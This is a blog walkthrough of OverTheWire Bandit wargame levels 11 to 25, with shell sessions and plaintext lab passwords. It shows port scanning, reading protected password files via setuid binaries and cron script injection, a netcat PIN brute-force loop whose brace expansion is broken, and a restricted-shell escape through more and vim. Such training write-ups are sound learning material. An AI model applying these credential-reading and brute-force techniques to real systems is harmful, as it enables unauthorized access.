Hey, Welcome Back! This post is the continuation to the “Bandit” Wargame found at: overthewire.org.
Today I will be covering Solutions 11 through 25, so if you haven’t completed Levels 1-10 in Bandit then I highly suggest you do so before you advance to the higher levels; since 1-10 provides you with a good basic foundation for the future levels. You can read my write-up and solutions for 1-10 here!
And remember folks, if you get stuck on a level… don’t just look up the solution! Google the question you have, and read any of the “Helpful Reading Materials” posted in each level. The point of these wargames is to learn, and not just copy!
So, without further do… let’s begin!
Level 11 -> 12:
The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions
bandit11@melinda:~$ ls -a
. .. .bash_logout .bashrc .profile data.txt
bandit11@melinda:~$ cat data.txt
Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh
bandit11@melinda:~$ echo Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh | tr [a-zA-Z] [n-za-mN-ZA-M]
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
Level 12 -> 13:
The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the data file using cp, and rename it using mv (read the manpages!)
bandit12@melinda:~$ ls -a
. .. .bash_logout .bashrc .profile data.txt
bandit12@melinda:~$ mkdir /tmp/jhalon
bandit12@melinda:~$ xxd -r data.txt > /tmp/jhalon/file.bin
bandit12@melinda:~$ cd /tmp/jhalon
bandit12@melinda:/tmp/jhalon$ ls -a
. .. file.bin
bandit12@melinda:/tmp/jhalon$ file file.bin
file.bin: gzip compressed data, was "data2.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/jhalon$ zcat file.bin | file -
/dev/stdin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | file -
/dev/stdin: gzip compressed data, was "data4.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | file -
/dev/stdin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | file -
/dev/stdin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | file -
/dev/stdin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | file -
/dev/stdin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | file -
/dev/stdin: gzip compressed data, was "data9.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat | file -
/dev/stdin: ASCII text
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
Please note! That we MUST remove the created directory after we are done. So we do the following…
bandit12@melinda:/tmp/jhalon$ cd ..
bandit12@melinda:/tmp$ rm -rf jhalon
bandit12@melinda:/tmp$ reset
NOTE: Everytime you create a directory in /tmp/ from now one, delete it before moving on.
Level 13 -> 14:
The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on
bandit13@melinda:~$ ls -a
. .. .bash_logout .bashrc .profile sshkey.private
bandit13@melinda:~$ ssh -i sshkey.private bandit14@localhost
Are you sure you want to continue connecting (yes/no)? yes
Great! We are inside Bandit14! So now let’s get the password from /etc/bandit_pass/bandit14
bandit14@melinda:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Level 14 -> 15:
The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.
bandit14@melinda:~$ telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
Level 15 -> 16:
The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.
Helpful note: Getting “HEARTBEATING” and “Read R BLOCK”? Use -ign_eof and read the “CONNECTED COMMANDS” section in the manpage. Next to ‘R’ and ‘Q’, the ‘B’ command also works in this version of that command…
bandit15@melinda:~$ openssl s_client -ign_eof -connect localhost:30001
...[redacted]...
SSL-Session:
...[redacted]...
Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
Level 16 -> 17:
The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.
bandit16@melinda:~$ nmap -p 31000-32000 -sV localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2016-09-09 01:39 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00050s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
31046/tcp open echo
31518/tcp open msdtc Microsoft Distributed Transaction Coordinator (error)
31691/tcp open echo
31790/tcp open msdtc Microsoft Distributed Transaction Coordinator (error)
31960/tcp open echo
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.34 seconds
bandit16@melinda:~$ echo cluFn7wTiGryunymYOu4RcffSxQluehd | openssl s_client -quiet -connect localhost:31518
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
cluFn7wTiGryunymYOu4RcffSxQluehd
bandit16@melinda:~$ echo cluFn7wTiGryunymYOu4RcffSxQluehd |openssl s_client -quiet -connect localhost:31790
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
Correct!
-----BEGIN RSA PRIVATE KEY-----
[redacted]
-----END RSA PRIVATE KEY-----
Great! So let’s copy the RSA Key (Don’t forget to get the Header and Footer) and create a new file in a tmp directory.
bandit16@melinda:~$ mkdir /tmp/jhalon
bandit16@melinda:~$ cd /tmp/jhalon
bandit16@melinda:/tmp/jhalon$ nano sshkey.private
bandit16@melinda:/tmp/jhalon$ chmod 600 sshkey.private
bandit16@melinda:/tmp/jhalon$ ssh -i ./sshkey.private bandit17@localhost
Level 17 -> 18:
There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new
NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19
bandit17@melinda:~$ ls -a
. .bandit16.password .bashrc .ssh passwords.new
.. .bash_logout .profile .ssl-cert-snakeoil.key passwords.old
bandit17@melinda:~$ diff passwords.new passwords.old
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR
Note: kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
is our password as diff
shows what needs to be changed to equal the second file. <
means first file (so passwords.new) and >
means second file (so passwords.old)
Level 18 -> 19:
The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.
root@kali:~# ssh bandit18@bandit.labs.overthewire.org "bash --norc"
ls -a
.
..
.bash_logout
.bashrc
.profile
readme
cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
Level 19 -> 20:
To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.
bandit19@melinda:~$ ls -a
. .. .bash_logout .bashrc .profile bandit20-do
bandit19@melinda:~$ ./bandit20-do
Run a command as another user.
Example: ./bandit20-do id
bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Level 20 -> 21:
There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.
NOTE 2: Try connecting to your own network daemon to see if it works as you think
bandit20@melinda:~$ ls -a
. .. .bash_logout .bashrc .profile suconnect
bandit20@melinda:~$ nc -l 32123 < /etc/bandit_pass/bandit20
Once you got NC (Netcat) listening on port 32123 (or any port of your choosing), open another Terminal and login to Bandit20 via SSH.
bandit20@melinda:~$ ls -a
. .. .bash_logout .bashrc .profile suconnect
bandit20@melinda:~$ ./suconnect 32123
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
Now if you look back at the first terminal you will see the password!
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Level 21 -> 22:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
bandit21@melinda:~$ cd /etc/cron.d/
bandit21@melinda:/etc/cron.d$ ls -a
. cronjob_bandit24 natas25_cleanup semtex0-ppc
.. cronjob_bandit24_root natas25_cleanup~ semtex5
.placeholder leviathan5_cleanup natas26_cleanup sysstat
behemoth4_cleanup manpage3_resetpw_job natas27_cleanup vortex0
cron-apt melinda-stats php5 vortex20
cronjob_bandit22 natas-session-toucher semtex0-32
cronjob_bandit23 natas-stats semtex0-64
bandit21@melinda:/etc/cron.d$ cat cronjob_bandit22
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@melinda:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Level 22 -> 23:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
bandit22@melinda:~$ cd /etc/cron.d/
bandit22@melinda:/etc/cron.d$ ls -a
. cronjob_bandit24 natas25_cleanup semtex0-ppc
.. cronjob_bandit24_root natas25_cleanup~ semtex5
.placeholder leviathan5_cleanup natas26_cleanup sysstat
behemoth4_cleanup manpage3_resetpw_job natas27_cleanup vortex0
cron-apt melinda-stats php5 vortex20
cronjob_bandit22 natas-session-toucher semtex0-32
cronjob_bandit23 natas-stats semtex0-64
bandit22@melinda:/etc/cron.d$ cat cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
Running cat on /usr/bin/cronjob_bandit23.sh we get the following Bash Script
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
From here, we will go ahead and try to find what the MD5 Check Sum of the echo is, following the cut
pipe.
bandit22@melinda:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@melinda:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Level 23 -> 24:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
bandit22@melinda:~$ cd /etc/cron.d/
bandit23@melinda:/etc/cron.d$ ls -a
. cronjob_bandit24 natas25_cleanup semtex0-ppc
.. cronjob_bandit24_root natas25_cleanup~ semtex5
.placeholder leviathan5_cleanup natas26_cleanup sysstat
behemoth4_cleanup manpage3_resetpw_job natas27_cleanup vortex0
cron-apt melinda-stats php5 vortex20
cronjob_bandit22 natas-session-toucher semtex0-32
cronjob_bandit23 natas-stats semtex0-64
bandit23@melinda:/etc/cron.d$ cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
Opening the cronjob_bandit24.sh script we get the following Bash Script, seen below:
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 "./$i"
rm -f "./$i"
fi
done
We will go ahead and create a temporary directory.
bandit23@melinda:/etc/cron.d$ mkdir /tmp/jhalon
bandit23@melinda:/etc/cron.d$ cd /tmp/jhalon
bandit23@melinda:/tmp/jhalon$ nano
Once you open Nano we will go ahead and write our own script to inject.
#!/bin/bash
cat /etc/bandit_pass/bandit24 > tmp/jhalon/pass
Save this new script as script.sh
. And go back into our console…
bandit23@melinda:/tmp/jhalon$ chmod 777 script.sh
bandit23@melinda:/tmp/jhalon$ cp script.sh /var/spool/bandit24
bandit23@melinda:/tmp/jhalon$ dir -a
. .. pass script.sh
bandit23@melinda:/tmp/jhalon$ cat /tmp/jhalon/pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Level 24 -> 25:
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
bandit24@melinda:~$ mkdir /tmp/jhalon
bandit24@melinda:~$ cd /tmp/jhalon
bandit24@melinda:/tmp/jhalon$ nano
We will go ahead and write a new Bash Script to Brute Force the PIN while attempting a connection.
#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for a in {0-10000}
do
echo $passwd' '$a | nc localhost 30002 >> result &
done
Save the script as script.sh
, and go back to console to run the script.
bandit24@melinda:/tmp/jhalon$ chmod 755 script.sh
bandit24@melinda:/tmp/jhalon$ ./script.sh
bandit24@melinda:/tmp/jhalon$ sort result | uniq -u
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Level 25 -> 26:
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
bandit25@melinda:~$ ls -a
. .bandit24.password .bashrc .profile
.. .bash_logout .pin bandit26.sshkey
bandit25@melinda:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@melinda:~$ cat /usr/bin/showtext
#!/bin/sh
more ~/text.txt
exit 0
Before we try to SSH into bandit26, shrink the Console down to only 5 lines and run the SSH
command.
bandit25@melinda:~$ ssh -i bandit26.sshkey bandit26@localhost
Once the command is ran, press V and it should take you to VIM, then type:
:r /etc/bandit_pass/bandit26
Press Enter
, and you should get the password!
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
Leave a Comment